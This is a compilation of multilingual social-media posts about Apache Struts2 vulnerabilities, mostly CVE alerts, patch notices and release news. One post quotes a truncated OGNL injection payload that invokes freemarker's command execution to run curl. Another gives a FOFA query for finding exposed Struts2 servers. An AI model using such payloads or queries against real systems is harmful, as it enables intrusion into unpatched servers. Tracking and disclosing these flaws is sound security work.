Remote Code Execution in Adobe AEM Forms via CVE-2025-54253 (Struts2 DevMode misconfig: auth bypass + OGNL eval) and CVE-2025-49533 (Insecure Deserialization). Both rated critical, identified in a VDP (now patched). Original research: https://t.co/uJoFgzyDk0

⚠️⚠️ CVE-2025-64775 : Apache Struts “File Leak” Vulnerability Threatens Disk Exhaustion 🔗FOFA Link: https://t.co/UxNi7CYuu4 🎯2.6m+ Results are found on the https://t.co/pb16tGXCUG nearly year. FOFA Query: app="Struts2" 🔖Refer: https://t.co/SptNSA6REN #OSINT #FOFA

🛡️365 Days of Hacking🛡️ 🔒 Day [159] 🧩 Machine: [Stratosphere-HTB] 🌟 Difficulty: [Medium] 🔍 Summary: [Vulnerable to Apache Struts2 S2-045, got command execution. Found user creds in MySQL DB and logged in via SSH. Python library hijacking on a file with sudo access.]

Vulnerability Analysis Tools 🔬 🔹httpX - httpx is a fast and multi-purpose HTTP toolkit that allows running multiple probes using the retryablehttp library. 🔗 https://t.co/B4BpPZr35o 🔹Struts-Scan - Struts2 vulnerability detection and utilization tools.

最近発見されたApache Struts2に関連するファイルアップロード脆弱性（CVE-2024-53677およびCVE-2023-50164）について ディレクトリトラバーサル攻撃を通じてファイルをアップロードできる可能性があり、RCEが可能になる場合があります。特に、Webシェルがルートにアップロードされると危険です。

まぁユーザ入力をポンポン気軽にプロパティに設定しちゃう作りを組み込む時点でセキュリティ意識はｱﾚか… Struts2の https://t.co/B4PVOeqwDx.bazがsetterになったりgetterになったりするのとﾙｲｰｼﾞしてるね

Struts2は、 2.0 2.1 2.2 2.3 2.5 2.6→6.0 7.0 の順ですね

Rapid7 analysis of Apache #Struts2 CVE-2024-53677 below via @the_emmons. Very similar to Struts CVE-2023-50164 — payloads have to be customized to the target and unsuccessful exploit attempts are being incorrectly interpreted as exploitation in the wild.

mixi2がいけるならStruts2もいけんだろ

Tracking CVE-2023-22527 and caught this nice post yesterday - label='%2b#request['.KEY_velocity.struts2.context'].internalGet('ognl').findValue(#parameters.x,{})%2b'&x=(new freemarker.template.utility.Execute()).exec({"curl

Apache Struts2 文件上传逻辑绕过(CVE-2024-53677)(S2-067)

Struts2 JQuery Plugin version 6.0.3 is out - pure dependency update release :) https://t.co/fb0XKKREwh #struts #jquery #plugin #release

Struts2 is the gift that keeps giving https://t.co/6E13WfV6i5

Apache Struts2 文件上传逻辑绕过(CVE-2024-53677)(S2-067)

🚨Exploit attempts leverage #PoC for #Apache #Struts2 CVE-2024-53677. #RCE risk from path traversal as attackers upload files like exploit.jsp to find vulnerable systems. Affected: #Struts < 6.4.0. 🔍 Stay ahead with SOCRadar’s Vulnerability Intelligence: https://t.co/NT7oUGwcRx

Switch2の抽選の話題で持ち切りですが、 Struts2 (7.0.3) は 3/3 にリリースされてました https://t.co/wsRDCqfFrS

Struts2: Un Path Traversal porta al caricamento di una Web Shell. La caccia è già iniziata! https://t.co/lNuqit3OYS #redhotcyber #hacking #cti #ai #online #it #cybercrime #cybersecurity #technology #news #cyberthreatintelligence #innovation #privacy #engineering #intelligence

! ALERT ! A critical vulnerability has been found in Apache Struts2 impacting versions below 6.4.0 (CVE-2024-53677). Affected organisations and users are encouraged to apply available patches and workarounds as soon as possible. Read the alert at https://t.co/ygddM1tpoq

2025年末にStruts2みたいな脆弱性に対応する悲哀